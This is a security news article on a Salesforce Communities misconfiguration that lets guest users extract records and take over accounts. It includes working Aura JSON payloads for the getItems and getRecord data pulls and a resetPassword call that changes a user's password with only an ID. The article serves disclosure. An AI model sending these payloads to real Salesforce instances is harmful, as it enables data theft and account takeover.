Wednesday, December 11, 2024
HomeCVE/vulnerabilitySalesforce Applications Vulnerability Could Allow Full Account Takeover

Salesforce Applications Vulnerability Could Allow Full Account Takeover

Published on

SIEM as a Service

A critical vulnerability has been discovered in Salesforce applications that could potentially allow a full account takeover.

The vulnerability, uncovered during a penetration testing exercise, hinges on misconfigurations within Salesforce Communities, particularly exploiting the Salesforce Lightning component framework.

The implications of this vulnerability are severe, affecting both data security and privacy. Attackers could gain access to sensitive personal information, manipulate data, and even take over administrative accounts.

- Advertisement - SIEM as a Service

Such breaches can lead to data theft, identity fraud, and significant financial and reputational damage to organizations using Salesforce.

Sample file exposed by a ContentDocument object
Sample file exposed by a ContentDocument object

The Vulnerability: A Detailed Look

The vulnerability primarily exploits Salesforce’s handling of unauthenticated users, known as Guest Users, within Communities.

Normally, Guest Users are heavily restricted in terms of what data they can access and what actions they can perform. However, in some cases, configurations and custom components expose sensitive information or functionality.

Leveraging 2024 MITRE ATT&CK Results for SME & MSP Cybersecurity Leaders – Attend Free Webinar

Key Points of Exploitation:

  • Mapping the Attack Surface: Attackers begin by mapping out the Salesforce instance to identify available endpoints and components. With valid aura.token and aura.context values, they can start extracting data and interact with various classes.
  • Using Standard Controllers: Two primary controllers are leveraged in exploiting this vulnerability:
    • getItems: Retrieves records of a given object but can bypass permissions if misconfigured. Example payload:
{
"actions": [
{
"id": "123;a",
"descriptor": "serviceComponent://ui.force.components.controllers.lists.selectableListDataProvider.SelectableListDataProviderController/ACTION$getItems",
"callingDescriptor": "UNKNOWN",
"params": {
"entityNameOrId": "ContentVersion",
"layoutType": "FULL",
"pageSize": 100,
"currentPage": 0,
"useTimeout": false,
"getCount": false,
"enableRowActions": false
}
}
]
}
  • getRecord: Retrieves specific records using a record ID.
{
  "actions": [
    {
      "id": "123;a",
      "descriptor": "serviceComponent://ui.force.components.controllers.detail.DetailController/ACTION$getRecord",
      "callingDescriptor": "UNKNOWN",
      "params": {
        "recordId": "0099g000001mWQaYHU",
        "record": null,
        "mode": "VIEW"
      }
    }
  ]
}
  • Extracting Sensitive Data: Using these controllers, attackers can extract personal identifiable information (PII), contact details, account information, and even documents from misconfigured Salesforce objects.
  • Exploiting Custom Apex Controllers: A particularly dangerous aspect is the misconfiguration of custom Apex controllers. The CA_ChangePasswordSettingController exposes a method resetPassword, which only requires a userID and a newPassword, allowing attackers to reset passwords without further verification.
{
"actions": [
{
"id": "123;a",
"descriptor": "apex://CA_ChangePasswordSettingController/ACTION$resetPassword",
"callingDescriptor": "UNKNOWN",
"params": {
"userID": "0056M",
"newPassword": "RT-wofnwo2!$4nfi!"
}
}
]
}
User’s password successfully reset
User’s password successfully reset

The ramifications of such a vulnerability are severe. Unauthorized access to sensitive data, identity theft, data manipulation, and full account takeovers are all possible outcomes.

In a worst-case scenario, an attacker could gain access to high-privilege accounts, resulting in the compromise of the entire Salesforce instance.

0xbro’s discovery underscores the importance of robust security practices in managing cloud-based applications.

As organizations increasingly rely on platforms like Salesforce for critical business operations, ensuring comprehensive security measures is paramount.

Adopting a proactive approach to securing applications can help mitigate risks and protect sensitive data from malicious actors.

Analyse Advanced Malware & Phishing Analysis With ANY.RUN Black Friday Deals : Get up to 3 Free Licenses.

Divya
Divya
Divya is a Senior Journalist at GBhackers covering Cyber Attacks, Threats, Breaches, Vulnerabilities and other happenings in the cyber world.

Latest articles

Resecurity introduces Government Security Operations Center (GSOC) at NATO Edge 2024

Resecurity, a global leader in cybersecurity solutions, unveiled its advanced Government Security Operations Center...

Reserachers Uncovered Zloader DNS Tunneling Tactics For Stealthy C2 Communication

Zloader, a sophisticated Trojan, has recently evolved with features that enhance its stealth and...

US Charged Chinese Hackers for Exploiting Thousands of Firewall

The US Treasury Department's Office of Foreign Assets Control (OFAC) has sanctioned Sichuan Silence...

DMD Diamond Launches Open Beta for v4 Blockchain Ahead of 2025 Mainnet

DMD Diamond - one of the oldest blockchain projects in the space has announced the...

API Security Webinar

72 Hours to Audit-Ready API Security

APIs present a unique challenge in this landscape, as risk assessment and mitigation are often hindered by incomplete API inventories and insufficient documentation.

Join Vivek Gopalan, VP of Products at Indusface, in this insightful webinar as he unveils a practical framework for discovering, assessing, and addressing open API vulnerabilities within just 72 hours.

Discussion points

API Discovery: Techniques to identify and map your public APIs comprehensively.
Vulnerability Scanning: Best practices for API vulnerability analysis and penetration testing.
Clean Reporting: Steps to generate a clean, audit-ready vulnerability report within 72 hours.

More like this

Reserachers Uncovered Zloader DNS Tunneling Tactics For Stealthy C2 Communication

Zloader, a sophisticated Trojan, has recently evolved with features that enhance its stealth and...

US Charged Chinese Hackers for Exploiting Thousands of Firewall

The US Treasury Department's Office of Foreign Assets Control (OFAC) has sanctioned Sichuan Silence...

DMD Diamond Launches Open Beta for v4 Blockchain Ahead of 2025 Mainnet

DMD Diamond - one of the oldest blockchain projects in the space has announced the...